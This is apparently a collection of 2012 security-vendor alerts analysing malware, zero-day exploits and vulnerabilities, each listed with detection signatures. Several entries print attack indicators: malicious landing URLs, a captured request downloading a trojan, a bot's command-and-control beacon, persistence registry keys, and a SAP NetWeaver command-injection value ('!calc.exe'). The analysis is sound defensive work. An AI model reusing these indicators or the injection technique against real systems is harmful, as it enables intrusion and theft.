New IE 0 day seen in the wild (Sep 17, 2012)

/in /by

Dell SonicWALL UTM Research team received reports of a new zero day exploit targeting newer versions of Internet Explorer in the wild. This zero day exploit targets a use-after-free vulnerability in Internet Explorer. The exploit is packaged in an encrypted SWF file along with JavaScript helper files. On successful exploit, it leads to the download and execution of a Poison Ivy RAT.

The exploit is attempted using the following components:

image

  • Exploit.html: This is the initial entry point of the exploit. It creates an img element and loads Moh2010.swf.
  • Moh2010.swf: The SWF is encrypted and obfuscated using DoSWF as shown below. On execution it performs a heap spray and creates an Iframe that leads to Protect.html.

  • Protect.html: It checks if it is running in Windows XP and Internet Explorer 7 or 8. It is to be noted however that this exploit is also successful on Internet explorer 9 and Windows Vista. We advise Dell SonicWALL customers to refrain from using Internet Explorer until this vulnerability is patched.

  • Poison Ivy RAT: When the exploit succeeds it downloads and executes a Poison Ivy RAT Trojan. The downloaded Trojan is XOR’ed using the key ‘0x70’ and is decrypted before execution. The Trojan performs the following activities when executed:
    • It creates a copy of itself:
      %temp%/1992218.dat [Detected as “GAV: Poison.NHM (Trojan)”
    • It creates a service to start itself on reboot:
      HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWmdmPmSN
    • It attempts to contact a remote server which was found to be taken down at the time of analysis

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: SWFExp.G (Trojan)
  • GAV: SWFLoad.G (Trojan)
  • GAV: Malformed.html.MT.2 (Exploit)
  • GAV: Shellcode.GEN_12
  • IPS: 8669 Microsoft IE selectAll execCommand Invocation
  • IPS: 7370 HTTP Client Shellcode Exploit 68a
  • IPS: 4665 HTTP Client Shellcode Exploit 13a

Microsoft Security Bulletin Coverage (Sep 11, 2012)

/in /by

Dell SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of September, 2012. A list of issues reported, along with Dell SonicWALL coverage information follows:

MS12-061 Vulnerability in Visual Studio Team Foundation Server Could Allow Elevation of Privilege (2719584)

  • CVE-2012-1892 XSS Vulnerability
    IPS:8607 – Microsoft Visual Studio Team Foundation Server XSS

MS12-062 Vulnerability in System Center Configuration Manager Could Allow Elevation of Privilege (2741528)

  • CVE-2012-2536 Reflected XSS Vulnerability
    IPS:1369 – Cross-Site Scripting (XSS) Attempt 1
    IPS:1380 – Cross-Site Scripting (XSS) Attempt 2

Win 8 Security System FakeAV with Rootkit discovered in the wild (Sep 7, 2012)

/in /by

Dell Sonicwall UTM research team have discovered a new FakeAV malware in the wild called Win 8 Security System. FakeAV malware of this nature has been covered before in a previous sonicalert. However, this FakeAV malware is different in that it deploys a rootkit driver as part of its infection process. This makes the malware very difficult to remove.

Although the sample we obtained failed to show any pop-up dialogs we were able to gain information about its intentions through our analysis.

The Trojan uses the following icon:

Upon infection, the Trojan deletes itself. It then makes the following changes to the filesystem

It copies itself to:

  • %APPDATA%72706355694bcd40.exe [Detected as GAV: FakeAV.WN8 (Trojan)]

It drops a rootkit to:

  • %WINDOWS%system32drivers2a236245d0309b5.sys [Detected as GAV: Rootkit.X (Trojan)]

The file attributes of the rootkit are set to protect it from modification or deletion even in safe-mode.

It adds the following key to the Windows registry to enable startup after reboot:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “%APPDATA%72706355694bcd40.exe”

A sample of keys added to register the rootkit driver:

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_2A236245D0309B5000 Service “2a236245d0309b5”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_2A236245D0309B5000 Legacy dword:00000001
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_2A236245D0309B5000 ConfigFlags dword:00000000
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_2A236245D0309B5000 Class “LegacyDriver”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_2A236245D0309B5000 DeviceDesc “2a236245d0309b5”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_2A236245D0309B5000Control ActiveService “2a236245d0309b5”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_9DC9B000 DeviceDesc “72706355694bcd40.exe”

The following HTML pages were extracted from the 72706355694bcd40.exe executable during analysis. The pages are used to hook into various browsers such as Internet Explorer and Google Chrome and produce a fake security alert:

We also extracted the following landing pages from the executable:

  • http://st777st.com/z.php?ver=2
  • http://win8sec.com/?do=payment&ver=2
  • http://win8sec.com/?do=minicontact&ver=2

The following screenshot is from the payment landing page:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: FakeAV.WN8 (Trojan)
  • GAV: Rootkit.X (Trojan)

GE Proficy KeyHelp ActiveX Control Vulnerability (Sep 6, 2012)

/in /by

The industrial software in GE Intelligent Platforms provides various functionalities including SCADA engine, distributed networking model, real-time information collection/analysis, graphical application development environment, batch automation and so forth.

Upon installation of the following software:

GE Proficy Historian
GE Proficy HMI/SCADA iFIX
GE Proficy Pulse
GE Proficy Batch Execution
GE Proficy I/O Drivers

an ActiveX control named KeyHelp.ocx is also deployed. This control adds HTML Help functionality from a third party.

A remote code execution vulnerability exists in GE Proficy products. The vulnerability is due to exposure of an unsafe method in the KeyHelp.ocx ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted webpage using Internet Explorer. Successful exploitation could lead to arbitrary code execution in the security context of the logged-in user. Failed attacks could lead to termination of the browser.

The vulnerability has been assigned as CVE-2012-2516.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 8582 GE Proficy KeyHelp ActiveX Instantiation

EMC AutoStart Buffer Overflow (Aug 29, 2012)

/in /by

EMC AutoStart provides high availability within multiple operating systems including UNIX, LINUX, and Microsoft Windows for Oracle, Microsoft Exchange, and SQL Server clustered environments. AutoStart monitors application, networks, servers, and storage and automates application restart on an alternate server-local or remote-in the event of a planned or unplanned service outage. On request, AutoStart automates failback of services, applications, and data quickly and efficiently to ensure business continuity.

The EMC AutoStart architecture is built around the concept of nodes, which are grouped in domains. One or more nodes can be grouped to form the AutoStart domain. All operations performed by AutoStart take place within the domain. The node is the basic building block within AutoStart. A node is any machine with an AutoStart agent installed and running. The agent provides the monitoring and management capabilities within the node.

The agent service listens on TCP port 8045 for communication with agents on other nodes. The communication protocol used by the AutoStart agent service is proprietary and not publicly documented. By observing the traffic transferred between AutoStart agents, the following patterns have been identified.

 Offset Size Description ------------------------------------- 0x00   4    unknown 0x04   2    major version number 0x06   2    minor version number 0x08   4    unknown DWORD 0x0c   4    code1 0x10   4    code2 0x14   4    length (x) size of data 0x18   x    data section

Multiple buffer overflow vulnerabilities have been found in EMC AutoStart product. A remote attacker can manipulate the traffic between the agents, such as the header listed above to potentially cause a denial of service, or possibly, execute arbitrary code within the context of the affected application.

Dell SonicWALL UTM team has researched these vulnerabilities and released the following IPS signatures to protect their customers.

  • 7703 EMC AutoStart Buffer Overflow 1
  • 8553 EMC AutoStart Buffer Overflow 2
  • 5512 Server Application Shellcode Exploit 28

The vulnerabilities have been identified as CVE-2012-0409 by CVE.

New Java Zero Day exploit attacks in the wild (Aug 27, 2012)

/in /by

Update – 08/28/2012

Dell SonicWALL UTM Research team discovered spam campaigns involving Blackhole exploit kit URLs already utilizing the new Java Zero Day exploit that we analyzed yesterday.

A sample e-mail message from the Intuit Spam campaign:

screenshot

Structure of the exploit file that gets executed on the victim machine if the user clicks on the URL:

screenshot

The malicious executable contacts.exe that gets downloaded on the target machine as a result of a successful exploit run in this case is a Cridex banking Trojan variant

Original Alert: Published – 08/27/2012

Dell SonicWALL UTM Research team found reports of a new zero-day vulnerability in the wild targeting Java that allows an attacker to download and execute a malicious executable on the victim machine.

We were able to confirm this exploit on the latest version 7 of Java in our research lab:

java version “1.7.0_06”
Java(TM) SE Runtime Environment (build 1.7.0_06-b24)

It is interesting to note that this exploit does not work on Java version 6. There is no information available on Oracle’s security advisory page at the time of writing this alert about this issue.

Infection Cycle

  • An unsuspecting user visits a malicious or compromised site that leads to the download of the Java exploit JAR file.
  • The Java exploit performs local privilege escalation, downloads and executes a malicious binary which in this case is Poison Ivy variant [Detected as GAV: Poison.NHM (Trojan)].
    • GET /meeting/hi.exe HTTP/1.1
      User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_03
  • The initial landing page contained highly obfuscated JavaScript code encrypted using a module named Dadong’s JSXX 0.44 VIP as seen below:

    screenshot

  • The malicious JAR exploit file that gets downloaded contains two classes Gondvv.class and Gondzz.class. Gondvv.class contains the init function and the first thing it does is disables protection against local file execution. It then checks if the Operating System is Windows and calls xrun() function in Gondzz.classs which downloads a remote file into the temp directory and runs it:

    screenshot

  • The server hosting the Java zero-day exploit is still active at the time of writing this Alert and serving Poison Ivy binary upon successful exploit runs.

    screenshot

Dell SonicWALL Gateway AntiVirus provides protection against this threat via following signatures:

  • GAV: Poison.NHM (Trojan)
  • GAV: JavaDZ.A (Exploit)
  • GAV: Malformed.class.MT.1 (Exploit)

Psychlo NewBoss v1.0 bot analysis

/in /by

Dell SonicWALL Threats Research team came across a new Malware submission that looks like a bot with backdoor functionality. The Malware executable appeared to arrive from a compromised site via drive-by download exploits.

The original Malware executable gets downloaded from maisonwake(REMOVED)/fancybox/a.gif using an image file extension for disguise. The malware author internally appears to be referring this malware as Psychlo NewBoss v1.0.

Infection Cycle

The bot when executed drops a copy of itself on the victim machine and runs it:

  • (All Users)MDGAUCC9epNUbnWkqPUVsE9suH5tvi.exe [Detected as GAV: Neojit.A (Trojan)]

It also ensures that the dropped malicious executable runs upon system reboot by adding following registry key:

  • HKUSoftwareMicrosoftWindowsCurrentVersionRunEP7gYQcJX: “(All Users)MDGAUCC9epNUbnWkqPUVsE9suH5tvi.exe”

It generates an internal configuration file that uses a GIF header with encrypted content appended to it. A sample of and encrypted & decrypted configuration file is shown below with the internal configuration file format as defined by the malware author:

screenshot

screenshot

The malware goes through the user’s Program Files and builds a list of Windows Executable files with IMAGE_FILE_MACHINE_I386 => x86 architecture. It then randomly picks one executable file from the list, runs it and injects malicious code into the legitimate program process.

screenshot

The legitimate program injected with malicious code creates a Mutex to mark its presence on the system:

  • MutexName = “{4012d34795ec88fec6a6d103659a9783}”

It then attempts to connect to the following remote domains at an interval of five minutes to register infection and get further instructions:

screenshot 

 GET /newg/a.php?s=00005c39&m=fdd79d5d654416b63e7b275628ebd57f&u=(Encoded Username)&g=nb.7Y49&o=(Operating System)&ml= HTTP/1.1 User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)

A partial list of commands that we encountered while analyzing this malware is shown below:

Psychlo NewBoss v1.0 Commands

  • ReadConfigFile
  • WriteConfigFile
  • LoadDefaultConfigFile
  • PrintConfigFile
  • Create
  • Destroy
  • ResetConfigFile
  • ParseCommandLine
  • SetAppType
  • LoadBaseApp
  • GenerateNewEncryptedSoftware
  • InjectIntoProgramFile
  • InstallRegAutoStart
  • Install
  • Update
  • Uninstall

We observed the following logging messages while analyzing this malware:

Psychlo NewBoss v1.0 Logging activity 

 SelfName:  Installer: Installing version nb.7Y49 Updating from version nb.7Y49  Injector Manager Dest:  Source file found:  File app decrypted:  Injectable programs found:  Injecting into:  Program code:   Accessing the server... Server.ConfigFile =  nb.7Y49 Update app ->  Download url =  File downloaded MD5 Good Decrypted Temp filename:  File saved:  Running modules ComputerName:  UserName:

Dell SonicWALL Gateway AntiVirus provides protection against this threat via following signatures:

  • GAV: Neojit.A (Trojan)
  • GAV: Neojit.A_2 (Trojan)

SAP NetWeaver Command Injection (August 24, 2012)

/in /by

SAP NetWeaver is an application framework which forms the base for SAP’s Business Suite. It includes a development and runtime environment for SAP and custom applications. NetWeaver uses the ABAP programming language specifically designed for business application programming along with industry standards allowing it to be integrated with technologies such as .NET and Java EE. NetWeaver contains several services and processes to handle incoming network requests. One such service is the remote management Simple Object Access Protocol (SOAP) interface. This particular interface allows administrators the ability to manage the system remotely from any computer with a web browser and Java support.

A command execution vulnerability exists in SAP NetWeaver. The vulnerability is due to insufficient validation of SOAP requests. When the vulnerable service receives a SOAP request from the user, it will use command-line tools in the background to process the request. Specifically, values from the mValue tag paired with mKey tags with values of “Database/Type”, “Database/Password”, “Database/Username” and “Database/Name” are used to create arguments for the shell command sapdbctrl.exe. The command line is generated in the following format:

 "C:Program FilesSAPhostctrlexesapdbctrl.exe" status "Database/Name" -P -T 1 -t "Database/Type" -p -u "Database/Username"

The vulnerable code encloses the parameters in quotes if they contain spaces and passes them to sapdbctrl.exe without validation. The binary also creates a set of command line parameters which it uses in a call to another shell command. This makes it possible to indirectly pass arguments to the other, more privileged, binary. The program also allows users to execute arbitrary system commands by prefixing the command with an exclamation mark. For example, to execute the calculator application on the target host, the command ‘!calc.exe’ can be injected.

By crafting a malicious request to create a script file containing commands to execute, followed by a malicious request to execute the script file, remote unauthenticated attackers can exploit this vulnerability to execute arbitrary commands on the target system. The executed commands will run with Administrative privileges.

Dell SonicWall has released an IPS signature that addresses attack permutations targeting this vulnerability. The following signature was released:

  • 8536 – SAP NetWeaver Remote Command Execution

New Cridex variant from drive-by blackhole exploit (Aug 17, 2012)

/in /by

Dell Sonicwall Threats research team have discovered a new variant of the Cridex Banking Trojan. The Trojan utilizes the blackhole exploit kit for drive-by system infection. The purpose of this Trojan is to steal online banking credentials. It has the ability to intercept encrypted communications between banking websites and their customers.

The infection occurs when visiting a webpage with a malicious blackhole script [Detected as GAV: BlacoleRef.W_8 (Exploit)]:

The Trojan creates the following file on the filesystem:

  • %APPDATA%KB01217753.exe [Detected as GAV: Cridex.E_4 (Trojan)]

The Trojan creates the following key in the Windows registry to enable startup after reboot:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun KB01217753.exe “%APPDATA%KB01217753.exe”

Upon infection the Trojan injects code into explorer.exe, causing it to send the following sensitive data, encrypted, to a remote C&C server:

In the same manner as in a previous variant, it hooks various Winsock internet communication API’s to intercept incoming and outgoing browser traffic.

It also hooks crypto API’s such as CryptDecrypt, CryptEncrypt, EncryptMessage and DecryptMessage. This is for the purposes of intercepting SSL communication between banking websites and thier customers and injecting html code into webpages to steal credentials. Below is a sample of a decrypted configuration file that we recieved from a remote C&C server:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: BlacoleRef.W_8 (Exploit)
  • GAV: Cridex.E_4 (Trojan)

Microsoft Security Bulletin Coverage (Aug 14, 2012)

/in /by

Dell SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of August, 2012. A list of issues reported, along with Dell SonicWALL coverage information follows:

MS12-052 Cumulative Security Update for Internet Explorer (2722913)

  • CVE-2012-1526 LayoutMemory Corruption Vulnerability
    IPS:8439 – Windows IE Layout Memory Corruption 4
  • CVE-2012-2521 Asynchronous NULL Object Access Remote Code Execution Vulnerability
    IPS:8442 – Suspicious HTML Style Tag 4
  • CVE-2012-2522 Virtual Function Table Corruption Remote Code Execution Vulnerability
    GAV: Malformed.html.MP.6
  • CVE-2012-2523 JavaScript Integer Overflow Remote Code Execution Vulnerability
    IPS:7645 – HTTP Client Shellcode Exploit 11a

MS12-053 Vulnerability in Remote Desktop Could Allow Remote Code Execution (2723135)

  • CVE-2012-2526 Remote Desktop Protocol Vulnerability
    IPS:4198 – Suspicious RDP Traffic 8

MS12-054 Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution (2733594)

  • CVE-2012-1850 Remote Administration Protocol Denial of Service Vulnerability
    IPS:8447 – Microsoft SMB Response Parsing Remote Code Execution (MS12-054) 3
  • CVE-2012-1851 Print Spooler Service Format String Vulnerability
    IPS:8446 – Windows Print Spooler Format String Exploit
    CVE-2012-1852 Remote Administration Protocol Heap Overflow Vulnerability
    IPS:8444 – Microsoft SMB Response Parsing Remote Code Execution (MS12-054) 2
  • CVE-2012-1853 Remote Administration Protocol Stack Overflow Vulnerability
    IPS:8443 – Microsoft SMB Response Parsing Remote Code Execution (MS12-054)

MS12-055 Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2731847)

  • CVE-2012-2527 Win32k Use After Free Vulnerability
    Local EoP vulnerability, not covered

MS12-056 Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution (2706045)

  • CVE-2012-2523 JavaScript Integer Overflow Remote Code Execution Vulnerability
    Please refer to MS12-052 above

MS12-057 Vulnerability inMicrosoft Office Could Allow for Remote Code Execution (2731879)

  • CVE-2012-2524 CGM File FormatMemory Corruption Vulnerability
    There is no public exploit available

MS12-058 Vulnerability inMicrosoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (2740358)

  • CVE-2012-2525 Oracle Outside In Libraries Remote Code Execution Vulnerability
    There is no details about this vulnerability

MS12-059 Vulnerability inMicrosoft Visio Could Allow Remote Code Execution (2733918)

  • CVE-2012-1888 Visio DXF File Format Buffer Overflow Vulnerability
    GAV: Malformed.dxf.MP.1

MS12-060 Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2720573)

  • CVE-2012-1856 MSCOMCTL.OCX RCE Vulnerability
    GAV: Malformed.rtf.MP.2